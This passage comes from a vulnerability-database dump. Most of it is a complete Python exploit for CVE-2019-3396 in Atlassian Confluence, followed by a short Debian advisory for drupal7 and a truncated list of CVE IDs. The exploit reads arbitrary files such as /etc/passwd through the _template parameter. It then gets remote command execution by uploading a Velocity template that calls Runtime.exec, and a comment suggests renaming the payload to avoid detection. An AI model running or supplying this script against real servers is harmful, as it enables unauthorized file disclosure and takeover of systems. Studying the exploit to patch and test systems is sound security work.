It then uses the original vulnerability but loads the template file\r\nwith the payload from the local filesystem instead of from a remote system.\r\n\r\nPrerequisites for RCE in this exploit:\r\n- an authenticated session is needed\r\n- knowledge of where attached files are stored on the file system - if it is not the default location then use the first mode\r\nto find it, it should be in the Confluence install directory under the ./attachments subdirectory\r\n\r\nUsage\r\n- list /etc folder on Confluence server hosted on http://confluence.example.com\r\n python exploit.py -th confluence.example.com fs /etc\r\n- get content of /etc/passwd on same server but through a proxy\r\n python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd\r\n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using\r\nexisting session)\r\n python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\"\r\n\r\nTested on Confluence versions:\r\n 6.12.1\r\n\r\nTo test the exploit:\r\n 1. Download Confluence trial version for version 6.12.1\r\n https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser\r\n network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and\r\n change the version in URL to be 6.12.1)\r\n SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin\r\n 2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default.\r\n chmod +x atlassian-confluence-6.12.1-x64.bin\r\n sudo ./atlassian-confluence-6.12.1-x64.bin\r\n 3. Open the browser to configure initial installation, when you get to license window copy the server ID.\r\n 4. 
Create account at https://my.atlassian.com/ and request for new trial license using server ID.\r\n 5. Activate the license and finish the installation with default options.\r\n 6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the\r\n exploit.\r\n 7. Run the exploit (see usage above).\r\n\"\"\"\r\n\r\n__version__ = \"1.0.0\"\r\n__author__ = \"46o60\"\r\n\r\nimport argparse\r\nimport logging\r\nimport requests\r\nimport urllib3\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport json\r\nimport random\r\nimport string\r\n\r\n# script and banner\r\nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\"\r\nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \r\n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \r\n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \r\n \r\n\"\"\"\r\n\r\n# turn off requests log output\r\nurllib3.disable_warnings()\r\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\r\n\r\n\r\ndef print_banner():\r\n \"\"\"\r\n Prints script ASCII banner and basic information.\r\n\r\n Because it is cool.\r\n \"\"\"\r\n print(ASCII_BANNER_TEXT)\r\n print(\"{} v{}\".format(SCRIPT_NAME, __version__))\r\n print(\"Author: {}\".format(__author__))\r\n print()\r\n\r\n\r\ndef exit_log(logger, message):\r\n \"\"\"\r\n Utility function to log exit message and finish the script.\r\n \"\"\"\r\n logger.error(message)\r\n exit(1)\r\n\r\n\r\ndef check_cookie_format(value):\r\n \"\"\"\r\n Checks if value is in format: ^[^=]+=[^=]+$\r\n \"\"\"\r\n pattern = r\"^[^=]+=[^=]+$\"\r\n if not re.match(pattern, value):\r\n raise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\")\r\n return value\r\n\r\n\r\ndef parse_arguments():\r\n \"\"\"\r\n Performs parsing of script arguments.\r\n \"\"\"\r\n # creating parser\r\n parser = argparse.ArgumentParser(\r\n prog=SCRIPT_NAME,\r\n description=\"Exploit CVE-2019-3396 to explore file system or gain RCE 
through file upload.\"\r\n )\r\n\r\n # general script arguments\r\n parser.add_argument(\r\n \"-V\", \"--version\",\r\n help=\"displays the current version of the script\",\r\n action=\"version\",\r\n version=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__)\r\n )\r\n parser.add_argument(\r\n \"-v\", \"--verbosity\",\r\n help=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\",\r\n action=\"count\",\r\n default=0\r\n )\r\n parser.add_argument(\r\n \"-sb\", \"--skip-banner\",\r\n help=\"skips printing of the banner\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-s\", \"--silent\",\r\n help=\"do not output results of the exploit to standard output\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-q\", \"--quiet\",\r\n help=\"do not output any logs\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n\r\n # arguments for input\r\n parser.add_argument(\r\n \"-px\", \"--proxy\",\r\n help=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\"\r\n )\r\n parser.add_argument(\r\n \"-t\", \"--tls\",\r\n help=\"use HTTPS protocol, default behaviour is to use plain HTTP\",\r\n action=\"store_true\"\r\n )\r\n parser.add_argument(\r\n \"-th\", \"--target-host\",\r\n help=\"target hostname/domain\",\r\n required=True\r\n )\r\n parser.add_argument(\r\n \"-p\", \"--port\",\r\n help=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\"\r\n )\r\n\r\n # two different sub commands\r\n subparsers = parser.add_subparsers(\r\n title=\"actions\",\r\n description=\"different behaviours of the script\",\r\n help=\"for detail description of available action options invoke -h for each individual action\",\r\n dest=\"action\"\r\n )\r\n\r\n # only exploring file system by disclosure of files and directories\r\n parser_file_system = subparsers.add_parser(\r\n \"fs\",\r\n 
help=\"use the exploit to browse local file system on the target endpoint\"\r\n )\r\n parser_file_system.add_argument(\r\n \"path\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_file_system.set_defaults(func=exploit_path_traversal)\r\n\r\n # using file upload to deploy payload and achieve RCE\r\n parser_rce = subparsers.add_parser(\r\n \"rce\",\r\n help=\"use the exploit to upload a template \"\r\n )\r\n parser_rce.add_argument(\r\n \"-hd\", \"--home-directory\",\r\n help=\"Confluence home directory on the server\"\r\n )\r\n parser_rce.add_argument(\r\n \"-c\", \"--cookie\",\r\n help=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \"\r\n \"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\",\r\n type=check_cookie_format,\r\n required=True\r\n )\r\n parser_rce.add_argument(\r\n \"command\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_rce.set_defaults(func=exploit_rce)\r\n\r\n # parsing\r\n arguments = parser.parse_args()\r\n\r\n return arguments\r\n\r\n\r\nclass Configuration:\r\n \"\"\"\r\n Represents all supported configuration items.\r\n \"\"\"\r\n\r\n # Parse arguments and set all configuration variables\r\n def __init__(self, script_args):\r\n self.script_arguments = script_args\r\n\r\n # setting input arguments\r\n self._proxy = self.script_arguments.proxy\r\n self._target_protocol = \"https\" if self.script_arguments.tls else \"http\"\r\n self._target_host = self.script_arguments.target_host\r\n self._target_port = self.script_arguments.port if self.script_arguments.port else \\\r\n 443 if self.script_arguments.tls else 80\r\n\r\n @staticmethod\r\n def get_logger(verbosity):\r\n \"\"\"\r\n Prepares logger to output to stdout with appropriate verbosity.\r\n \"\"\"\r\n logger = logging.getLogger()\r\n # default logging level\r\n 
logger.setLevel(logging.DEBUG)\r\n\r\n # Definition of logging to console\r\n ch = logging.StreamHandler()\r\n # specific logging level for console\r\n if verbosity == 0:\r\n ch.setLevel(logging.INFO)\r\n elif verbosity > 0:\r\n ch.setLevel(logging.DEBUG)\r\n\r\n # formatting\r\n class MyFormatter(logging.Formatter):\r\n\r\n default_fmt = logging.Formatter('[?] %(message)s')\r\n info_fmt = logging.Formatter('[+] %(message)s')\r\n error_fmt = logging.Formatter('[-] %(message)s')\r\n warning_fmt = logging.Formatter('[!] %(message)s')\r\n debug_fmt = logging.Formatter('>>> %(message)s')\r\n\r\n def format(self, record):\r\n if record.levelno == logging.INFO:\r\n return self.info_fmt.format(record)\r\n elif record.levelno == logging.ERROR:\r\n return self.error_fmt.format(record)\r\n elif record.levelno == logging.WARNING:\r\n return self.warning_fmt.format(record)\r\n elif record.levelno == logging.DEBUG:\r\n return self.debug_fmt.format(record)\r\n else:\r\n return self.default_fmt.format(record)\r\n\r\n ch.setFormatter(MyFormatter())\r\n\r\n # adding handler\r\n logger.addHandler(ch)\r\n\r\n return logger\r\n\r\n # Properties\r\n @property\r\n def endpoint(self):\r\n if not self._target_protocol or not self._target_host or not self._target_port:\r\n exit_log(log, \"failed to generate endpoint URL\")\r\n return f\"{self._target_protocol}://{self._target_host}:{self._target_port}\"\r\n\r\n @property\r\n def remote_path(self):\r\n return self.script_arguments.path\r\n\r\n @property\r\n def attachment_dir(self):\r\n home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\\r\n Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR\r\n return f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\"\r\n\r\n @property\r\n def rce_command(self):\r\n return self.script_arguments.command\r\n\r\n @property\r\n def session_cookie(self):\r\n if not self.script_arguments.cookie:\r\n return None\r\n parts = self.script_arguments.cookie.split(\"=\")\r\n 
return {\r\n parts[0]: parts[1]\r\n }\r\n\r\n @property\r\n def proxies(self):\r\n return {\r\n \"http\": self._proxy,\r\n \"https\": self._proxy\r\n }\r\n\r\n\r\nclass Exploit:\r\n \"\"\"\r\n This class represents actual exploit towards the target Confluence server.\r\n \"\"\"\r\n # used for both path traversal and RCE\r\n DEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\"\r\n\r\n # used only for RCE\r\n CREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\"\r\n PERSONAL_SPACE_KEY_PATH = \"/index.action\"\r\n PERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\"\r\n PERSONAL_SPACE_ID_PATH = \"/rest/api/space\"\r\n PERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\"\r\n HOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\"\r\n ATL_TOKEN_PATH = \"/pages/viewpageattachments.action\"\r\n FILE_UPLOAD_PATH = \"/pages/doattachfile.action\"\r\n # file name has no real significance, file is identified on file system by it's ID\r\n # (change only if you want to avoid detection)\r\n DEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format(\r\n ''.join(random.choice(string.ascii_lowercase) for i in range(5))\r\n ) # the extension .vm is not really needed, remove it if you have problems uploading the template\r\n DEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\"\r\n DEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\"\r\n # using random name for uploaded file so it will always be first version of the file\r\n DEFAULT_FILE_VERSION = \"1\"\r\n\r\n def __init__(self, config):\r\n \"\"\"\r\n Runs the exploit towards target_url.\r\n \"\"\"\r\n self._config = config\r\n\r\n self._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\"\r\n\r\n if self._config.script_arguments.action == \"rce\":\r\n self._root_url = f\"{self._config.endpoint}/\"\r\n self._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\"\r\n 
self._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\"\r\n\r\n # Following data will be dynamically created while exploit is running\r\n self._space_key = None\r\n self._personal_space_id_url = None\r\n self._space_id = None\r\n self._homepage_id = None\r\n self._atl_token_url = None\r\n self._atl_token = None\r\n self._upload_url = None\r\n self._file_id = None\r\n\r\n def generate_payload_location(self):\r\n \"\"\"\r\n Generates location on file system for uploaded attachment based on Confluence Ver003 scheme.\r\n\r\n See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html\r\n \"\"\"\r\n if not self._space_id or not self._homepage_id or not self._file_id:\r\n exit_log(log, \"cannot generate payload location without space, homepage and file ID\")\r\n\r\n space_folder_one = str(int(self._space_id[-3:]) % 250)\r\n space_folder_two = str(int(self._space_id[-6:-3]) % 250)\r\n space_folder_three = self._space_id\r\n page_folder_one = str(int(self._homepage_id[-3:]) % 250)\r\n page_folder_two = str(int(self._homepage_id[-6:-3]) % 250)\r\n page_folder_three = self._homepage_id\r\n file_folder = self._file_id\r\n version = Exploit.DEFAULT_FILE_VERSION\r\n\r\n payload_location = f\"{self._config.attachment_dir}/\" \\\r\n f\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\\r\n f\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\\r\n f\"{file_folder}/{version}\"\r\n log.debug(f\"generated payload location: {payload_location}\")\r\n\r\n return payload_location\r\n\r\n def path_traversal(self, target_remote_path, decode_output=False):\r\n \"\"\"\r\n Uses vulnerability in _template parameter to achieve path traversal.\r\n\r\n Args:\r\n target_remote_path (string): path on local file system of the target application\r\n decode_output (bool): set to True if output of the file will be character codes separated by new lines,\r\n used with RCE\r\n \"\"\"\r\n 
post_data = {\r\n \"contentId\": str(random.randint(1, 10000)),\r\n \"macro\": {\r\n \"body\": \"\",\r\n \"name\": \"widget\",\r\n \"params\": {\r\n \"_template\": f\"file://{target_remote_path}\",\r\n \"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice(\r\n string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11))\r\n }\r\n }\r\n }\r\n\r\n log.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\")\r\n response = requests.post(\r\n self._target_url,\r\n headers={\r\n \"Content-Type\": \"application/json; charset=utf-8\"\r\n },\r\n json=post_data,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"exploit failed\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve\r\n # the requested path\r\n error_element = soup.find_all(\"div\", \"widget-error\")\r\n if error_element:\r\n log.warning(\"failed to retrieve target path on the system\")\r\n log.warning(\"target path does not exist or application does not have appropriate permissions to view it\")\r\n return \"\"\r\n else:\r\n # otherwise parse out the actual response (file content or directory listing)\r\n output_element = soup.find_all(\"div\", \"wiki-content\")\r\n\r\n if not output_element:\r\n exit_log(log, \"application did not return appropriate HTML element\")\r\n if not len(output_element) == 1:\r\n log.warning(\"application unexpectedly returned multiple HTML elements, using the first one\")\r\n output_element = output_element[0]\r\n\r\n log.debug(\"extracting HTML element value and stripping the leading and trailing spaces\")\r\n # output = 
output_element.string.strip()\r\n output = output_element.decode_contents().strip()\r\n\r\n if \"The macro 'widget' is unknown. It may have been removed from the system.\" in output:\r\n exit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\")\r\n\r\n if not self._config.script_arguments.silent:\r\n if decode_output:\r\n parsed_output = \"\"\r\n p = re.compile(r\"^([0-9]+)\")\r\n for line in output.split(\"\\n\"):\r\n r = p.match(line)\r\n if r:\r\n parsed_output += chr(int(r.group(1)))\r\n print(parsed_output.strip())\r\n else:\r\n print(output)\r\n\r\n return output\r\n\r\n def find_personal_space_key(self):\r\n \"\"\"\r\n Makes request that will return personal space key in the response.\r\n \"\"\"\r\n log.debug(\"checking if user has personal space\")\r\n response = requests.get(\r\n self._root_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n )\r\n page_content = response.text\r\n if \"Add personal space\" in page_content:\r\n log.info(f\"user does not have personal space, creating it now...\")\r\n\r\n response = requests.post(\r\n self._create_personal_space_url,\r\n headers={\r\n \"Content-Type\": \"application/json\"\r\n },\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n json={\r\n \"spaceUserKey\": \"\"\r\n }\r\n )\r\n\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to create personal space\")\r\n\r\n log.debug(f\"personal space created\")\r\n response_data = response.json()\r\n self._space_key = response_data.get(\"key\")\r\n else:\r\n log.info(\"sending request to find personal space key\")\r\n response = requests.get(\r\n self._personal_space_key_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not 
response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n personal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\")\r\n if not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"):\r\n exit_log(log, \"failed to find personal space link in the response, does the user have personal space?\")\r\n path = personal_space_link_element[\"href\"]\r\n p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX)\r\n r = p.match(path)\r\n if r:\r\n self._space_key = r.group(1)\r\n else:\r\n exit_log(log, \"failed to find personal space key\")\r\n\r\n log.debug(f\"personal space key: {self._space_key}\")\r\n self._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\\r\n f\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\"\r\n log.debug(f\"generated personal space id url: {self._personal_space_id_url}\")\r\n\r\n def find_personal_space_id_and_homepage_id(self):\r\n \"\"\"\r\n Makes request that will return personal space ID and homepage ID in the response.\r\n \"\"\"\r\n if self._personal_space_id_url is None:\r\n exit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\")\r\n\r\n log.info(\"sending request to find personal space ID and homepage\")\r\n response = requests.get(\r\n self._personal_space_id_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is JSON\r\n data = json.loads(page_content)\r\n\r\n if 
\"results\" not in data:\r\n exit_log(log, \"failed to find 'result' section in json output\")\r\n items = data[\"results\"]\r\n if type(items) is not list or len(items) == 0:\r\n exit_log(log, \"no results for personal space id\")\r\n personal_space_data = items[0]\r\n if \"id\" not in personal_space_data:\r\n exit_log(log, \"failed to find ID in personal space data\")\r\n self._space_id = str(personal_space_data[\"id\"])\r\n log.debug(f\"found space id: {self._space_id}\")\r\n if \"_expandable\" not in personal_space_data:\r\n exit_log(log, \"failed to find '_expandable' section in personal space data\")\r\n personal_space_expandable_data = personal_space_data[\"_expandable\"]\r\n if \"homepage\" not in personal_space_expandable_data:\r\n exit_log(log, \"failed to find homepage in personal space expandable data\")\r\n homepage_path = personal_space_expandable_data[\"homepage\"]\r\n p = re.compile(Exploit.HOMEPAGE_REGEX)\r\n r = p.match(homepage_path)\r\n if r:\r\n self._homepage_id = r.group(1)\r\n log.debug(f\"found homepage id: {self._homepage_id}\")\r\n self._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\"\r\n log.debug(f\"generated atl token url: {self._atl_token_url}\")\r\n self._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\"\r\n log.debug(f\"generated upload url: {self._upload_url}\")\r\n else:\r\n exit_log(log, \"failed to find homepage id, homepage path has incorrect format\")\r\n\r\n def get_csrf_token(self):\r\n \"\"\"\r\n Makes request to get the current CSRF token for the session.\r\n \"\"\"\r\n if self._atl_token_url is None:\r\n exit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\")\r\n\r\n log.info(\"sending request to find CSRF token\")\r\n response = requests.get(\r\n self._atl_token_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n 
)\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n atl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"})\r\n if not atl_token_element.has_attr(\"value\"):\r\n exit_log(log, \"failed to find value for atl_token\")\r\n self._atl_token = atl_token_element[\"value\"]\r\n log.debug(f\"found CSRF token: {self._atl_token}\")\r\n\r\n def upload_template(self):\r\n \"\"\"\r\n Makes multipart request to upload the template file to the server.\r\n \"\"\"\r\n log.info(\"uploading template to server\")\r\n if not self._atl_token:\r\n exit_log(log, \"cannot upload a file without CSRF token\")\r\n if self._upload_url is None:\r\n exit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\")\r\n\r\n # Velocity template here executes command and then captures the output. Here the output is generated by printing\r\n # character codes one by one in each line. This can be improved for sure but did not have time to investigate\r\n # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern\r\n # webapp' was not working properly. 
This gets decoded on our python client later.\r\n template = f\"\"\"#set( $test = \"test\" )\r\n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\"))\r\n#set($exout = $ex.waitFor())\r\n#set($out = $ex.getInputStream())\r\n#foreach($i in [1..$out.available()])\r\n#set($ch = $out.read())\r\n$ch\r\n#end\"\"\"\r\n\r\n log.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\")\r\n parts = {\r\n \"atl_token\": (None, self._atl_token),\r\n \"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template),\r\n \"confirm\": \"Attach\"\r\n }\r\n response = requests.post(\r\n self._upload_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n files=parts\r\n )\r\n\r\n # for successful upload first a 302 response needs to happen then 200 page is returned with file ID\r\n if response.status_code == 403:\r\n exit_log(log, \"got 403, probably problem with CSRF token\")\r\n if not len(response.history) == 1 or not response.history[0].status_code == 302:\r\n exit_log(log, \"failed to upload the payload\")\r\n\r\n page_content = response.content\r\n\r\n if \"Upload Failed\" in str(page_content):\r\n exit_log(log, \"failed to upload template\")\r\n\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n file_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME})\r\n if not file_link_element.has_attr(\"data-linked-resource-id\"):\r\n exit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\")\r\n self._file_id = file_link_element[\"data-linked-resource-id\"]\r\n log.debug(f\"found file ID: {self._file_id}\")\r\n\r\n\r\ndef exploit_path_traversal(config):\r\n \"\"\"\r\n This sends one request towards vulnerable server to either get local file content or directory listing.\r\n \"\"\"\r\n 
log.debug(\"running path traversal exploit\")\r\n\r\n exploit = Exploit(config)\r\n exploit.path_traversal(config.remote_path)\r\n\r\n\r\ndef exploit_rce(config):\r\n \"\"\"This executes multiple steps to gain RCE. Requires a session token.\r\n\r\n Steps:\r\n 1. find personal space key for the user\r\n 2. find personal space ID and homepage ID for the user\r\n 3. get CSRF token (generated per session)\r\n 4. upload template file with Java code (involves two requests, first one is 302 redirection)\r\n 5. use path traversal part of exploit to load and execute local template file\r\n 6. profit\r\n \"\"\"\r\n log.debug(\"running RCE exploit\")\r\n\r\n exploit = Exploit(config)\r\n exploit.find_personal_space_key()\r\n exploit.find_personal_space_id_and_homepage_id()\r\n exploit.get_csrf_token()\r\n exploit.upload_template()\r\n payload_location = exploit.generate_payload_location()\r\n exploit.path_traversal(payload_location, decode_output=True)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # parse arguments and load all configuration items\r\n script_arguments = parse_arguments()\r\n log = Configuration.get_logger(script_arguments.verbosity)\r\n\r\n configuration = Configuration(script_arguments)\r\n\r\n # printing banner\r\n if not configuration.script_arguments.skip_banner:\r\n print_banner()\r\n\r\n if script_arguments.quiet:\r\n log.disabled = True\r\n\r\n log.debug(\"finished parsing CLI arguments\")\r\n log.debug(\"configuration was loaded successfully\")\r\n log.debug(\"starting exploit\")\r\n\r\n # disabling warning about trusting self sign certificate from python requests\r\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\n # run appropriate function depending on mode\r\n configuration.script_arguments.func(configuration)\r\n\r\n log.debug(\"done!\")", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49465"}], "debian": [{"lastseen": "2021-01-22T01:17:45", 
"bulletinFamily": "unix", "cvelist": ["CVE-2020-36193"], "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2530-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Gunnar Wolf\nJanuary 21, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : drupal7\nVersion : 7.52-2+deb9u14\nCVE ID : CVE-2020-36193\n\nDrupal identified a vulnerability in the version of the Archive_Tar\nlibrary it bundles (CVE-2020-36193), which allows out-of-path\nextraction vulnerabilities, granting it the Drupal Security Advisory\nID SA-CORE-2021-001:\n\n https://www.drupal.org/sa-core-2021-001\n\nFor Debian 9 "Stretch", the fix to this issue was backported in\nversion 7.52-2+deb9u14.\n\nWe recommend you upgrade your drupal7 package.\n\nFor detailed security status of drupal7, please refer to its security\ntracker page:\n\n https://security-tracker.debian.org/tracker/source-package/drupal7\n\nFurther information about Debian LTS security advisories, how to\napply these updates to your system, and other frequently asked\nquestions can be found at:\n\n https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-01-21T20:00:49", "published": "2021-01-21T20:00:49", "id": "DEBIAN:DLA-2530-1:90DEF", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202101/msg00018.html", "title": "[SECURITY] [DLA-2530-1] drupal7 security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}], "mscve": [{"lastseen": "2021-01-22T21:32:36", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-6408", "CVE-2021-21108", "CVE-2021-21114", "CVE-2020-16024", "CVE-2020-6409", "CVE-2020-16043", "CVE-2020-6548", "CVE-2020-6518", "CVE-2020-6464", "CVE-2020-16026", "CVE-2020-15965", "CVE-2020-16012", "CVE-2020-16000", "CVE-2020-6395", "CVE-2020-6569", "CVE-2020-6445", "CVE-2020-6454", "CVE-2020-6381", "CVE-2020-16011", "CVE-2020-15979", 
"CVE-2020-6428", "CVE-2020-6564", "CVE-2020-6424", "CVE-2020-6446", "CVE-2020-6458", "CVE-2020-6394", "CVE-2020-6397", "CVE-2020-15962", "CVE-2020-6506", "CVE-2020-6468", "CVE-2020-6831", "CVE-2020-15969", "CVE-2020-16007", "CVE-2020-6570", "CVE-2020-6533", "CVE-2020-6434", "CVE-2020-16032", "CVE-2020-6561", "CVE-2020-6432", "CVE-2020-6540", "CVE-2020-6559", "CVE-2020-6447", "CVE-2020-6545", "CVE-2020-6554", "CVE-2020-6566", "CVE-2020-1341", "CVE-2020-6399", "CVE-2020-6452", "CVE-2020-6483", "CVE-2020-6392", "CVE-2020-6387", "CVE-2020-6482", "CVE-2020-6528", "CVE-2020-6563", "CVE-2020-16031", "CVE-2020-15974", "CVE-2020-16030", "CVE-2020-16039", "CVE-2020-6486", "CVE-2020-6412", "CVE-2020-15960", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6407", "CVE-2020-6494", "CVE-2020-6547", "CVE-2020-6529", "CVE-2020-6476", "CVE-2021-21116", "CVE-2020-15999", "CVE-2020-6507", "CVE-2020-6537", "CVE-2020-6416", "CVE-2020-6410", "CVE-2020-6460", "CVE-2020-6560", "CVE-2020-16027", "CVE-2020-16009", "CVE-2020-6461", "CVE-2021-21107", "CVE-2020-6574", "CVE-2020-6479", "CVE-2020-6511", "CVE-2020-6568", "CVE-2020-6386", "CVE-2020-6459", "CVE-2020-15982", "CVE-2020-6542", "CVE-2020-15968", "CVE-2020-6396", "CVE-2020-16002", "CVE-2020-6474", "CVE-2020-6467", "CVE-2020-6383", "CVE-2020-15975", "CVE-2020-6465", "CVE-2020-15985", "CVE-2020-6538", "CVE-2020-6493", "CVE-2020-6550", "CVE-2020-16001", "CVE-2020-6534", "CVE-2020-16023", "CVE-2020-16042", "CVE-2020-16029", "CVE-2020-6437", "CVE-2020-6444", "CVE-2020-15989", "CVE-2020-6451", "CVE-2020-6532", "CVE-2020-6521", "CVE-2021-21109", "CVE-2020-6429", "CVE-2020-6427", "CVE-2020-6536", "CVE-2020-6439", "CVE-2020-15972", "CVE-2020-6385", "CVE-2020-16005", "CVE-2020-6401", "CVE-2019-19926", "CVE-2020-15966", "CVE-2020-16004", "CVE-2020-6535", "CVE-2019-19925", "CVE-2020-16008", "CVE-2020-6455", "CVE-2020-6571", "CVE-2020-6519", "CVE-2020-6414", "CVE-2020-6391", "CVE-2020-6472", "CVE-2020-16016", "CVE-2020-6420", "CVE-2020-6417", 
